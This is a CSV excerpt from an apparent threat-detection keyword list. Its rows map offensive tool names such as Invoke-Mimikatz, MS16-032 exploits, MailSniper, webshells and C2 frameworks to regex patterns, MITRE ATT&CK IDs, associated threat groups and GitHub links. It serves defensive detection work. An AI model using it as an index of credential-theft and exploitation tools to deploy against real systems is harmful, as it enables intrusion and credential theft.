"*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49181"
"*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","49182"
"*Invoke-MimiDoggies*",".{0,1000}Invoke\-MimiDoggies.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49183"
"*Invoke-Mimidogz*",".{0,1000}Invoke\-Mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49184"
"*Invoke-Mimidogz.ps1*",".{0,1000}Invoke\-Mimidogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49185"
"*Invoke-Mimikatz -Command *",".{0,1000}Invoke\-Mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49186"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49187"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49188"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49189"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49190"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49191"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49192"
"*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","49193"
"*Invoke-Mimikatz.json*",".{0,1000}Invoke\-Mimikatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49194"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","49195"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49196"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49197"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49198"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49199"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49200"
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49201"
"*Invoke-Mimikatz-old*",".{0,1000}Invoke\-Mimikatz\-old.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49202"
"*Invoke-MimikatzWDigestDowngrade*",".{0,1000}Invoke\-MimikatzWDigestDowngrade.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49203"
"*Invoke-mimikittenz*",".{0,1000}Invoke\-mimikittenz.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","49204"
"*Invoke-Mimikittenz*",".{0,1000}Invoke\-Mimikittenz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49205"
"*Invoke-mimikittenz.ps1*",".{0,1000}Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49206"
"*Invoke-MITM6*",".{0,1000}Invoke\-MITM6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49207"
"*Invoke-ModifiableProgramsCheck*",".{0,1000}Invoke\-ModifiableProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49208"
"*Invoke-Mongoose*",".{0,1000}Invoke\-Mongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49209"
"*Invoke-MonitorCredSniper*",".{0,1000}Invoke\-MonitorCredSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49210"
"*Invoke-MS16*",".{0,1000}Invoke\-MS16.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49211"
"*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16032.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49212"
"*Invoke-MS16032.ps1*",".{0,1000}Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49213"
"*Invoke-MS16-032.ps1*",".{0,1000}Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49214"
"*Invoke-MS16-032.ps1*",".{0,1000}Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49215"
"*Invoke-MS16135*",".{0,1000}Invoke\-MS16135.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49216"
"*Invoke-MSSprinkler*",".{0,1000}Invoke\-MSSprinkler.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","49217"
"*Invoke-MSSQLup*",".{0,1000}Invoke\-MSSQLup.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49218"
"*Invoke-NamedPipePermissionsCheck*",".{0,1000}Invoke\-NamedPipePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49219"
